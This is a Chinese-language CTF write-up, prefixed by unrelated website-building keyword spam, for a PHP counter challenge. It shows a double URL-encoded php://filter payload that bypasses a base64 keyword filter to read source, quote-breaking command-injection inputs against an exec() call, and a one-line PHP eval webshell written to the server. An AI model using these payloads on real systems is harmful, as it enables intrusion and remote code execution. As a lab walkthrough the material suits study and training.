郑州营销型网站制作策划,学设计去哪个学校好,手机浏览微网站,昌吉网站建设公司摆烂一周了#xff0c;继续更#xff01;#xff01;题目还是简单哦。 提示明显要我们修改数据包#xff0c;第一反应是修改referer。试了一下不太对。url很可能存在文件包含
使用伪协议读取一下源码吧。它过滤了base64关键字。尝试url编码绕过#xff0c;这里可以使用二…摆烂一周了继续更题目还是简单哦。 提示明显要我们修改数据包第一反应是修改referer。试了一下不太对。url很可能存在文件包含
使用伪协议读取一下源码吧。它过滤了base64关键字。尝试url编码绕过这里可以使用二次编码
php://filter/read%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%35%25%36%45%25%36%33%25%36%46%25%36%34%25%36%35/resourcecheck.php
这里我把中间都url二次编码了
!DOCTYPE html
html langenheadmeta charsetUTF-8meta nameviewport contentwidthdevice-width, initial-scale1.0meta http-equivX-UA-Compatible contentieedgetitlecount is here/titlestylehtml,body {overflow: none;max-height: 100vh;}/style
/headbody styleheight: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;centerimg srcquestion.jpg height200 width200 / /center?phpini_set(max_execution_time, 5);if ($_COOKIE[pass] ! getenv(PASS)) {setcookie(pass, PASS);die(h2.hacker.h2.br.h1.404.h1.br.Sorry, only people from GWHT are allowed to access this website..23333);}?h1A Counter is here, but it has someting wrong/h1forminput typehidden valueGWHT.php namefiletextarea styleborder-radius: 1rem; typetext namecount rows10 cols50/textareabr /input typesubmit/form?phpif (isset($_GET[count])) {$count $_GET[count];if(preg_match(/;|base64|rot13|base32|base16|\?php|#/i, $count)){die(hacker!);}echo h2The Count is: . exec(printf \ . $count . \ | wc -c) . /h2;}?/body/html okk也是知道在cookie里边修改。但是getenv环境变量吗其实这里还有一个robots.txt 所有这里还能伪协议继续读取
php://filter/read%2563%256F%256E%2576%2565%2572%2574%252E%2562%2561%2573%2565%2536%2534%252D%2565%256E%2563%256F%2564%2565/resourcecheck.php 应该是要修改成这个最开始不就提示了嘛我这猪脑子。然后界面就变成了这个。根据上上边源码这里就可以命令执行了 过滤了 这是最重要的。
//代码在这
?phpif (isset($_GET[count])) {$count $_GET[count];if(preg_match(/;|base64|rot13|base32|base16|\?php|#/i, $count)){die(hacker!);}echo h2The Count is: . exec(printf \ . $count . \ | wc -c) . /h2;}?开始绕过我们重点关注这串代码 exec(printf \ . $count . \ | wc -c)--去掉阔号和引号看看呢--printf \ . $count . \ | wc -c--去引号--printf . $count . | wc -c所有我们输入的count在执行命令时被括号包起来了。只需要把单引号闭合即可 在数据包里要转换为%26。
%26ls%26
这样就能执行命令了 的确是回显了因为exec只输出最后一行所以它没显示完整。但是没关系先找下flag位置
%27%26find/-nameflag*%26%27 在这个路径下呢。但是打开这个问年没回显。要么权限不够要么过滤回显。这属于是权限不够。还是得写木马上蚁剑
%26echo?eval(\$_POST[cmd])?2.php%26
注意了$前边的\不能少因为要取消$特殊含义。 图形化啥也没有。。。还是换命令行吧。输入env试试效果呢 喜出望外哦。其实不是这样的。GWHT目录下存在README文件里边有密码当前用户权限不够需要切换用户。这里我也不知道看的大佬的。 啊你说这个明文密码怎么来的。害那个README里边的md5值拿去碰撞以下就可以了。ok到此结束
